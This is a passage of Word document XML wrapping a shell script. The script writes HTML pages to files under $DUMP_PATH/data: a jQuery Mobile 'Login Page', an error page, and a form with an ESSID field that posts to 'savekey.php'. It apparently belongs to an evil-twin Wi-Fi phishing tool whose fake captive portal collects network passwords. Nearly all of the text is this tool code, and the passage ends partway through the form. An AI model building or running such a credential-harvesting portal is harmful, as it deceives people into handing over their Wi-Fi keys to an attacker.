    <w:p w14:paraId="63C0E4A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A106E85" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="636CE9B0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DEB10" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3FB4C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53063830" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A66EBE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"page\" id=\"second\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF338AD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"header\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD233E4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;h3&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D9328" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A363DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AD234" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"content\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9EE24A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C2313" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA62DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6EFB98" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB6CB1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AE9A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6302AEDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB5682" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;/html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D32AD97" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"&gt;$DUMP_PATH/data/final.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A5723" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652DDF63" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDFB49B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40205767" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;title&gt;Login&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C5F3FE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E2E7D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;style&gt;$(cat $DUMP_PATH/data/jquery.mobile-1.3.2.css)&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA5BBC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;script&gt;$(cat $DUMP_PATH/data/jquery-1.8.3.min.js)&lt;/script&gt;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E0B78" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;script&gt;$(cat $DUMP_PATH/data/jquery.mobile-1.3.2.js)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAE212" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFA075" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB9321" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"page\" id=\"login\" data-theme=\"b\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70781EAB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"header\" data-theme=\"a\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D837A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;h3&gt;Login Page&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9B4D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA7311" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD3568" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"content\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6B5A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD32CC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    "$DIALOG_WEB_ERROR"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72695363" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0E44A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">&lt;a href=\"index.htm\" data-role=\"button\" rel=\"external\" data-inline=\"true\" id=\"back\" onclick=\"location.reload();location.href='index.htm'\"&gt;"$DIALOG_WEB_BACK"&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632D74F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A9ECF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B2C02" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71444D7F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DFC3E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2C126" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8947C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C55666" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"page\" id=\"second\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229082EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"header\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB083A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;h3&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65775BE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DAE05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9CE62" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"content\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF53E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD297A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7610366E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67052194" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE62247" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDCCC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01656648" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A117B00" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;/html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA8743B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"&gt;$DUMP_PATH/data/error.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088000D9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD3503" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7860F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EE2B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C4439" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;title&gt;Login&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56220BF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73319A41" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;style&gt;$(cat $DUMP_PATH/data/jquery.mobile-1.3.2.css)&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7B12A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;script&gt;$(cat $DUMP_PATH/data/jquery-1.8.3.min.js)&lt;/script&gt;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49547458" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;script&gt;$(cat $DUMP_PATH/data/jquery.mobile-1.3.2.js)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480036E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B460039" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>#login-button {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783642C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    margin-top: 30px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6C12D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DC958" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11320153" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>.ui-grid-c {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46698426" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    text-align : center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF8C15" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>margin-right: -50% !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EADD925" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E704046" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435EA37B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B28EA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>.ui-block-b {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17AF39" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    text-align : left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA2900" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3B240" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A2582" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DA133" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>.ui-block-a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E0B7B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    text-align : right;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B1B2A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>margin-right: 10px !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDFDEA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692C3F6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="077498ED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B666F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79357BD9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD37A2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC08CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"page\" id=\"login\" data-theme=\"b\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADAC78F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"header\" data-theme=\"a\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626BB66" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;h3&gt;Login Page&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F01B08" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A0015" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F22156" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"content\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5B5E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;fieldset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F908C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;form id=\"check-user\" class=\"ui-body ui-body-a ui-corner-all\" data-ajax=\"false\" action=\"savekey.php\" method=\"POST\" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468FE7D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;div class=ui-grid-c&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7BAA8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0902E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      &lt;div class=ui-block-a&gt;ESSID:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
